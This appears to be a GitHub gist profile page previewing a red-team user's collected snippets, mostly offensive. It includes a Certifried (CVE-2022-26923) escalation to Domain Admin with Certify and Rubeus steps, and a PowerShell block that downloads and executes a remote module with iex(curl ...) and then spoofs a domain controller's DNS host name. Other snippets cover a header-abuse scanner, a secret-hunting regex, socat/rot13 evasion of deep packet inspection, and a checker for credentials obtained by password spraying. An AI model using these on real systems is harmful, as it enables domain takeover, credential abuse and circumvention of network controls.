Skip to content

Instantly share code, notes, and snippets.

View queencitycyber's full-sized avatar
💭
knuckin n buckin

clandestination queencitycyber

💭
knuckin n buckin
View GitHub Profile
@VictorTaelin
VictorTaelin / gpt4_abbreviations.md
Last active May 25, 2024 08:44
Notes on the GPT-4 abbreviations tweet

Notes on this tweet.

  • The screenshots were taken on different sessions.

  • The entire sessions are included on the screenshots.

  • I lost the original prompts, so I had to reconstruct them, and still managed to reproduce.

  • The "compressed" version is actually longer! Emojis and abbreviations use more tokens than common words.

@tothi
tothi / certifried_with_krbrelayup.md
Last active November 22, 2023 10:47
Certifried combined with KrbRelayUp: non-privileged domain user to Domain Admin without adding/pre-owning computer accounts

Certifried combined with KrbRelayUp

Certifried (CVE-2022-26923) gives Domain Admin from non-privileged user with the requirement adding computer accounts or owning a computer account. Kerberos Relay targeting LDAP and Shadow Credentials gives a non-privileged domain user on a domain-joined machine local admin access on (aka owning) the machine. Combination of these two: non-privileged domain user escalating to Domain Admin without the requirement adding/owning computer accounts.

The attack below uses only Windows (no Linux tools interacting with the Domain), simulating a real-world attack scenario.

Prerequisites:

@dmchell
dmchell / Program.cs
Created May 12, 2022 10:41
Exploit for Active Directory Domain Privilege Escalation (CVE-2022–26923)
// Exploit for Active Directory Domain Privilege Escalation (CVE-2022–26923)
// Author: @domchell - MDSec
// This exploit can be used to update the relveant AD attributes required to enroll in a machine template as any machine in AD using an existing machine account
// Adjusting MS-DS-Machine-Account-Quota is not sufficient to stop this attack :)
// Steps:
// 1. Escalate on any workstation (hint: krbrelayup ftw)
// 2. Execute UpdateMachineAccount.exe as SYSTEM
// 3. Enroll in machine template e.g. (Certify.exe request /ca:"ca.evil.corp\\CA" /template:Computer /machine /subject:CN=dc.evil.corp
// 4. Request a TGT using the certificate e.g. (Rubeus.exe asktgt /user:dc$ /domain:evil.corp /dc:dc.evil.corp /certificate:<base64 cert> /enctype:AES256)
@queencitycyber
queencitycyber / hbh-header-abuse-test.py
Created May 11, 2022 18:48 — forked from ndavison/hbh-header-abuse-test.py
Attempts to find hop-by-hop header abuse potential against the provided URL.
# github.com/ndavison
import requests
import random
import string
from argparse import ArgumentParser
parser = ArgumentParser(description="Attempts to find hop-by-hop header abuse potential against the provided URL.")
parser.add_argument("-u", "--url", help="URL to target (without query string)")
iex(curl https://raw.githubusercontent.com/samratashok/ADModule/master/Import-ActiveDirectory.ps1 -UseBasicParsing )
Import-ActiveDirectory
Set-ADComputer WIN-JQTB1UHHF2S -ServicePrincipalNames @{REPLACE="HOST/WIN-JQTB1UHHF2S","RestrictedKrbHost/WIN-JQTB1UHHF2S"} -Verbose
#in my testing i had to set dnshostname to $null first
Set-ADComputer WIN-JQTB1UHHF2S -DNSHostName $null
Set-ADComputer WIN-JQTB1UHHF2S -DNSHostName dc1.batcave.local
(?i)((access_key|access_token|admin_pass|admin_user|algolia_admin_key|algolia_api_key|alias_pass|alicloud_access_key|amazon_secret_access_key|amazonaws|ansible_vault_password|aos_key|api_key|api_key_secret|api_key_sid|api_secret|api.googlemaps AIza|apidocs|apikey|apiSecret|app_debug|app_id|app_key|app_log_level|app_secret|appkey|appkeysecret|application_key|appsecret|appspot|auth_token|authorizationToken|authsecret|aws_access|aws_access_key_id|aws_bucket|aws_key|aws_secret|aws_secret_key|aws_token|AWSSecretKey|b2_app_key|bashrc password|bintray_apikey|bintray_gpg_password|bintray_key|bintraykey|bluemix_api_key|bluemix_pass|browserstack_access_key|bucket_password|bucketeer_aws_access_key_id|bucketeer_aws_secret_access_key|built_branch_deploy_key|bx_password|cache_driver|cache_s3_secret_key|cattle_access_key|cattle_secret_key|certificate_password|ci_deploy_password|client_secret|client_zpk_secret_key|clojars_password|cloud_api_key|cloud_watch_aws_access_key|cloudant_password|cloudflare_api_key|cloudflare_auth_k
@puzzlepeaches
puzzlepeaches / latestpd.py
Created April 1, 2022 10:46
Download latest Linux projectdiscovery tools with Python. Comment out line 54 if you want to hold on to the zipfiles following download.
import os
import glob
import zipfile
import requests
from lastversion import latest
tools = ["nuclei", "httpx", "dnsx", "subfinder", "naabu", "shuffledns"]
def get_version(tools):
for i in tools:
@gmurdocca
gmurdocca / socat_caesar_dpi.md
Last active January 22, 2024 05:08
Circumventing Deep Packet Inspection with Socat and rot13

Circumventing Deep Packet Inspection with Socat and rot13

I have a Linux virtual machine inside a customer's private network. For security, this VM is reachable only via VPN + Citrix + Windows + a Windows SSH client (eg PuTTY). I am tasked to ensure this Citrix design is secure, and users can not access their Linux VM's or other resources on the internal private network in any way outside of using Citrix.

The VM can access the internet. This task should be easy. The VM's internet gateway allows it to connect anywhere on the internet to TCP ports 80, 443, and 8090 only. Connecting to an internet bastion box on one of these ports works and I can send and receive clear text data using netcat. I plan to use good old SSH, listening on tcp/8090 on the bastion, with a reverse port forward configured to expose sshd on the VM to the public, to show their Citrix gateway can be circumvented.

Rejected by Deep Packet Inspection

I hit an immediate snag. The moment I try to establish an SSH or SSL connection over o

@puzzlepeaches
puzzlepeaches / mailboxcheck.py
Created February 2, 2022 16:25
Lets you feed in a list of user credentials guessed during spraying to check if they have a valid mailbox for an on-prem Exchange server. Basically an easy way to tell if you are going to be able to abuse an ActiveSync endpoint or not. Need to install exchangelib for this to work.
import os
import argparse
from exchangelib import Credentials, Account, Configuration
from exchangelib.errors import ErrorNonExistentMailbox, UnauthorizedError
def args():
parser = argparse.ArgumentParser()
parser.add_argument("-c", "--creds", dest="creds", help="List of known valid user credentials in the format user@acme.com:password", action='store', required=True)
parser.add_argument("-t", "--target", dest="target", help="Target Exchange server.", action='store', required=True)
args = parser.parse_args()
import requests
import random
import string
import sys
import time
import requests
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def id_generator(size=6, chars=string.ascii_lowercase + string.digits):